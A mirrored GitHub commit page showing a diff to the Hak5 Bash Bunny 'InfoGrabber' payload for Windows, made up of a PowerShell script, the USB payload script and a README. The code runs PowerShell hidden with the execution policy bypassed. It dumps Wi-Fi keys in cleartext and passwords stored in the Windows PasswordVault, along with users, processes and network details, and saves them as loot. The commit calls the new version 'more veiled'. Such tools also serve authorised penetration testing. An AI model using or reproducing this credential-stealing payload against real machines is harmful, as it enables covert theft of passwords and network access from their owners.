mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Updated InfoGrabber payload (#279)
This commit is contained in:
DannyK999
Sebastian Kinne
parent
c58e10dcab
commit
060d5744b0
@ -1,8 +1,9 @@
|
||||
# Shows details of currently running PC
|
||||
# Simen Kjeserud (Original creator), Gachnang
|
||||
# Simen Kjeserud (Original creator), Gachnang, DannyK999 (Version 2.0)
|
||||
|
||||
#Get info about pc
|
||||
|
||||
# Get IP / Nework Info
|
||||
try
|
||||
{
|
||||
$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
|
||||
@ -21,6 +22,7 @@ $IsDHCPEnabled = $true
|
||||
[string[]]$computerMAC =$Network.MACAddress
|
||||
}
|
||||
|
||||
#Get System Info
|
||||
$computerSystem = Get-CimInstance CIM_ComputerSystem
|
||||
$computerBIOS = Get-CimInstance CIM_BIOSElement
|
||||
|
||||
@ -47,11 +49,10 @@ if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").
|
||||
$RDP = "RDP is NOT enabled"
|
||||
}
|
||||
|
||||
# Get network interfaces
|
||||
#| where { $_.ipaddress -notlike $null }
|
||||
# Get Network Interfaces
|
||||
$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
|
||||
|
||||
# Get wifi SSID and password
|
||||
# Get wifi SSIDs and Passwords
|
||||
$WLANProfileNames =@()
|
||||
#Get all the WLAN profile names
|
||||
$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
|
||||
@ -82,8 +83,7 @@ $luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Na
|
||||
# process first
|
||||
$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine
|
||||
|
||||
# get listeners / ActiveTcpConnections
|
||||
#[System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties().GetActiveTcpConnections() | Format-Table -AutoSize
|
||||
# Get Listeners / ActiveTcpConnections
|
||||
$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
|
||||
$listener = $listener | foreach-object {
|
||||
$listenerItem = $_
|
||||
@ -113,29 +113,7 @@ $drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $nu
|
||||
# videocard
|
||||
$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution
|
||||
|
||||
#Get installed passwords
|
||||
$profileRows = $output | Select-String -Pattern 'All User Profile'
|
||||
$profileNames = New-Object System.Collections.ArrayList
|
||||
for($i = 0; $i -lt $profileRows.Count; $i++){
|
||||
$profileName = ($profileRows[$i] -split ":")[-1].Trim()
|
||||
$profileOutput = netsh.exe wlan show profiles name="$profileName" key=clear
|
||||
$SSIDSearchResult = $profileOutput| Select-String -Pattern 'SSID Name'
|
||||
$profileSSID = ($SSIDSearchResult -split ":")[-1].Trim() -replace '"'
|
||||
$passwordSearchResult = $profileOutput| Select-String -Pattern 'Key Content'
|
||||
if($passwordSearchResult){
|
||||
$profilePw = ($passwordSearchResult -split ":")[-1].Trim()
|
||||
} else {
|
||||
$profilePw = ''
|
||||
}
|
||||
$networkObject = New-Object -TypeName psobject -Property @{
|
||||
ProfileName = $profileName
|
||||
SSID = $profileSSID
|
||||
Password = $profilePw
|
||||
}
|
||||
$profileNames.Add($networkObject)
|
||||
}
|
||||
$profileNames.Add($networkObject)
|
||||
|
||||
#Get stored passwords
|
||||
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
|
||||
$vault = New-Object Windows.Security.Credentials.PasswordVault
|
||||
$vault = $vault.RetrieveAll() | % { $_.RetrievePassword();$_ }
|
||||
@ -180,7 +158,7 @@ $computerSystem.Name
|
||||
"Network: "
|
||||
"=================================================================="
|
||||
"Computers MAC address: " + $computerMAC
|
||||
"Computers IP address: " + $computerIP.ipaddress[0]
|
||||
"Computers IP address: " + $computerIP.ipaddress[0]
|
||||
"Public IP address: " + $computerPubIP
|
||||
"RDP: " + $RDP
|
||||
""
|
||||
@ -210,5 +188,3 @@ $computerSystem.Name
|
||||
"Windows/user passwords"
|
||||
"=================================================================="
|
||||
$vault | select Resource, UserName, Password | Sort-Object Resource | ft -AutoSize
|
||||
|
||||
|
||||
|
||||
@ -1,11 +1,12 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: Info_Grabber
|
||||
# Author: Simen Kjeserud
|
||||
# Version: 1.0
|
||||
# Target: Windows
|
||||
# Creds: Hak5Darren for inspiration
|
||||
#
|
||||
# Title: Info_Grabber
|
||||
# Original Author: Simen Kjeserud
|
||||
# V2.0 Author: DannyK999
|
||||
# Version: 2.0
|
||||
# Target: Windows
|
||||
# Creds: Hak5Darren, Hak5 and Simen Kjeserud for inspiration
|
||||
#
|
||||
# Executes run.ps1 which executes scripts that gets you information about
|
||||
# the computer running and will also get wifi passwords
|
||||
|
||||
@ -15,9 +16,6 @@ ATTACKMODE HID STORAGE
|
||||
GET SWITCH_POSITION
|
||||
|
||||
LED ATTACK
|
||||
QUACK GUI r
|
||||
QUACK DELAY 200
|
||||
# Open run and run the run.ps1 script in the Bashbunny
|
||||
QUACK STRING powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
|
||||
QUACK ENTER
|
||||
# Run the run.ps1 script in the BashBunny
|
||||
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
|
||||
LED FINISH
|
||||
|
||||
@ -1,10 +1,13 @@
|
||||
# InfoGrabber for the Bunnys
|
||||
# Info Grabber for the BashBunny
|
||||
|
||||
Author: Simen Kjeserud
|
||||
Original Author Simen Kjeserud
|
||||
|
||||
Version: Version 1.0
|
||||
V2.0 Author: DannyK999
|
||||
|
||||
Version: Version 2.0
|
||||
|
||||
Credit: Hak5Darren, Hak5 and Simen Kjeserud for inspiration
|
||||
|
||||
Credit: Hak5Darren for inspiration
|
||||
|
||||
((`\
|
||||
___ \\ '--._
|
||||
@ -12,13 +15,15 @@ Credit: Hak5Darren for inspiration
|
||||
/ \ '. __.'
|
||||
_| /_ \ \_\_
|
||||
{_\______\-'\__\_\
|
||||
Check out my website:
|
||||
Check out Simen's website:
|
||||
aknemis.com
|
||||
|
||||
## Description
|
||||
|
||||
Gather a lot of information about the computer and place it in a text file in loot/info/.
|
||||
|
||||
Updates include code/output cleanup, faster runtime, and more veiled execution.
|
||||
|
||||
Here you can se what it will look like:
|
||||
|
||||
|
||||
@ -64,10 +69,6 @@ Here you can se what it will look like:
|
||||
|
||||
Made for windows. The only thing you will need to change is the Ducky language so it matches the keyboard input.
|
||||
|
||||
## Requirements
|
||||
|
||||
DuckyTools for the BashBunny, and you need to change to the language the computer uses.
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user